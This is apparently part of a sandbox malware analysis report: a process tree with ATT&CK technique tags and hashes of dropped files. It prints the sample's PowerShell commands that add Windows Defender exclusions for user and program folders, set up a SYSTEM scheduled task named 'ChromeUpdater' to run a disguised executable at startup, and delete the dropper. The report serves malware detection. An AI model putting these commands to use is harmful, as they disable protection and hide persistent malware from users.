- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2632 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2632 -s 6484⤵
- Loads dropped DLL
- Program crash
PID:2900
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2396
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gdqir#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdater' /tr '''C:\Program Files\Google\Chrome\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdater' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:628 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn ChromeUpdater /tr "'C:\Program Files\Google\Chrome\ChromeUpdater.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:788
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "ChromeUpdater"2⤵PID:1900
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Windows\SoftwareDistribution\Download\IJKwvlweCTVOlzLhQRZpkMjAxiYgKM.exe"2⤵PID:1940
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵PID:688
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1064
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#gdqir#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdater' /tr '''C:\Program Files\Google\Chrome\ChromeUpdater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\ChromeUpdater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdater' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3000 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn ChromeUpdater /tr "'C:\Program Files\Google\Chrome\ChromeUpdater.exe'"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2072
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:604
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:888
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {C4DE7895-53AF-4F8A-84C6-8DBB8C9EACF2} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
PID:820 -
C:\Program Files\Google\Chrome\ChromeUpdater.exe"C:\Program Files\Google\Chrome\ChromeUpdater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:2148
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5060a9d492eb13b842aad02350b1e7284
SHA138be5b02a8db6bcc884ab9968cc6e968933cef0c
SHA256ef7848cafcc9287ec535cc0f98cd26257f03f4dea69e5f175cba8d7629b2075a
SHA512eade10f9e1099b16f7d2361c4a7d7ed23ca211a6b24fb786f9d348416ad5f998e6079ba82966f7e518fe22f80f4443c0026df6bc0812a349ddddc29b97618748
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0QYX02WP2M7XBHB8DC0F.temp
Filesize7KB
MD59548b045fe14d798e4a19e59da89c651
SHA1f0d5428453e4d587b92a7acf9ea4a26dc74c4ad9
SHA25626af643b645203769edb18ea1f52de2ea9bfd6faeaadda5fb2d88044285aca0f
SHA512d9a87b6eb0bc837834249a812a484a80c0ab0a1e745cc3ae62b1d05caae2950a974ed6614ce04ff1d3d9b85a1c977f6ab880d8e535a278889511170d247ca44d
-
Filesize
595KB
MD569b8138d0e9dd6b169043520330bceac
SHA1aabe9458e1751623e727fb775e923103a02afe7a
SHA25601825f4cb340163af8d9f803a31dc20c1e33404ced73e17dbf74896d7ec1c34b
SHA512fa135dfec349bc9a3fd8348b2a60352a01ef27d73505550291953b2274994aff88a614fd225b97c2824fa05e91580ac7dd2292065a99514d17f731c0711574d0
-
Filesize
201KB
MD5d4f11c9a6a07f2a9ec69bc367b9243be
SHA163a5efac9bee6e1fd7de45fe10b5768c8fd9e382
SHA2560dcf580f5f74465642419ae9f8c56ea2cb4116d8d2c37f4ee4e3dcd45c50f1f0
SHA51214d061b2b6b486f0294c2228dd5badfbcd3296be59777449239201bcf3095b0c89eafe9e88683b1c924022ee795aee8e5b6483046a08d824f74d1061aa7846e0
-
Filesize
133KB
MD5b789be46d520694943db87140ba6edb6
SHA13cc6c4ac64112a771ccd3235e313dcfcdc7a78d9
SHA256a6195edcc520035e9baf76f120fa62909ccea148a3a4596d81cda06e08fef962
SHA512648d70c844d4425c5a83882836ea65067e54eed181d355e950a267da5ad92343ef08a4cb4eccfe45aa8561be94ac686807c867d0e0cb438ddf5988e502923d34
-
Filesize
9.8MB
MD5f0d66591cc208003b04be406c2ea8420
SHA106458ca23059df3117666cb4a64dc2e26f9daf97
SHA256927f00ec370ff3aa74cb58bcd118e6198f1945fe7691f8f73f3feaa046dcfb5d
SHA512cf67d6eaac9bc848297df4b4f67ff6ef606161b1e9198af6a7f5430a240ca261503c23bb2c15b386a1b421181a399531a3735739a2b860beb18f5e8ea5c01c6a